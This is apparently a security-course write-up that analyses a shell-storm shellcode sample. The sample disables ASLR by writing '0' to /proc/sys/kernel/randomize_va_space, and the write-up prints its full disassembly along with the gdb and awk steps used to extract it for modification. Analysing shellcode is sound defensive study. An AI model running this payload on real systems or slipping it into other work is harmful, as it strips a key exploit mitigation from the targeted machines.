6.C.1. Assignment

2. ASLR deactivation

This time we’ll be analysing a ASLR deactivation shellcode found on shell-storm.org.

Compiling original file:
Some warnings popup, we ignore those for now:

$ ../compile_c.sh c_linx86_aslr-disable_shellstorm_sample2_original
[+] Compiling ... 
c_linx86_aslr-disable_shellstorm_sample2_original.c: In function ‘main’:
c_linx86_aslr-disable_shellstorm_sample2_original.c:55:33: warning: incompatible implicit declaration of built-in function ‘strlen’ [enabled by default]
[+] Done!

Debuggging GDB:

$ gdb -q ./c_linx86_aslr-disable_shellstorm_sample2_original
Reading symbols from /home/vbox/exam/assignment_6/c_linx86_aslr-disable_shellstorm_sample2_original...(no debugging symbols found)...done.

Setting breakpoint at code function:

gdb-peda$ b *&shellcode
Breakpoint 1 at 0x804a040
gdb-peda$ r

Printing out code part and to file:

We just copy the bytes which are being used for the “code” function.

gdb-peda$ x/28i &shellcode
=> 0x804a040 <shellcode>:	xor    eax,eax
   0x804a042 <shellcode+2>:	push   eax
   0x804a043 <shellcode+3>:	push   0x65636170
   0x804a048 <shellcode+8>:	push   0x735f6176
   0x804a04d <shellcode+13>:	push   0x5f657a69
   0x804a052 <shellcode+18>:	push   0x6d6f646e
   0x804a057 <shellcode+23>:	push   0x61722f6c
   0x804a05c <shellcode+28>:	push   0x656e7265
   0x804a061 <shellcode+33>:	push   0x6b2f7379
   0x804a066 <shellcode+38>:	push   0x732f636f
   0x804a06b <shellcode+43>:	push   0x72702f2f
   0x804a070 <shellcode+48>:	mov    ebx,esp
   0x804a072 <shellcode+50>:	mov    cx,0x2bc
   0x804a076 <shellcode+54>:	mov    al,0x8
   0x804a078 <shellcode+56>:	int    0x80
   0x804a07a <shellcode+58>:	mov    ebx,eax
   0x804a07c <shellcode+60>:	push   eax
   0x804a07d <shellcode+61>:	mov    dx,0x3a30
   0x804a081 <shellcode+65>:	push   dx
   0x804a083 <shellcode+67>:	mov    ecx,esp
   0x804a085 <shellcode+69>:	xor    edx,edx
   0x804a087 <shellcode+71>:	inc    edx
   0x804a088 <shellcode+72>:	mov    al,0x4
   0x804a08a <shellcode+74>:	int    0x80
   0x804a08c <shellcode+76>:	mov    al,0x6
   0x804a08e <shellcode+78>:	int    0x80
   0x804a090 <shellcode+80>:	inc    eax
   0x804a091 <shellcode+81>:	int    0x80

Using GDB for logging to file

gdb-peda$ set logging file gdb_linx86_aslr-disable-shellstorm_sample2.txt
gdb-peda$ set logging on
Redirecting output to gdb_linx86_aslr-disable-shellstorm_sample2.txt.
gdb-peda$ x/28i &shellcode
gdb-peda$ set logging off
Done logging to gdb_linx86_aslr-disable-shellstorm_sample2.txt.

AWK’ing created file

Using yet again some AWK and SED magic.

$ awk '{print substr($0, index($0, $3))}' gdb_linx86_aslr-disable-shellstorm_sample2.txt | sed -e 's/<shellcode>:\t//' 
xor    eax,eax
push   eax
push   0x65636170
push   0x735f6176
push   0x5f657a69
push   0x6d6f646e
push   0x61722f6c
push   0x656e7265
push   0x6b2f7379
push   0x732f636f
push   0x72702f2f
mov    ebx,esp
mov    cx,0x2bc
mov    al,0x8
int    0x80
mov    ebx,eax
push   eax
mov    dx,0x3a30
push   dx
mov    ecx,esp
xor    edx,edx
inc    edx
mov    al,0x4
int    0x80
mov    al,0x6
int    0x80
inc    eax
int    0x80

$ awk '{print substr($0, index($0, $3))}' gdb_linx86_aslr-disable-shellstorm_sample2.txt | sed -e 's/<shellcode>:\t//' > asm_linx86_aslr-disable_shellstorm_sample2.asm

Copy for own modifications

$ cp asm_linx86_aslr-disable_shellstorm_sample2.asm asm_linx86_aslr-disable_shellstorm_sample2-alt.asm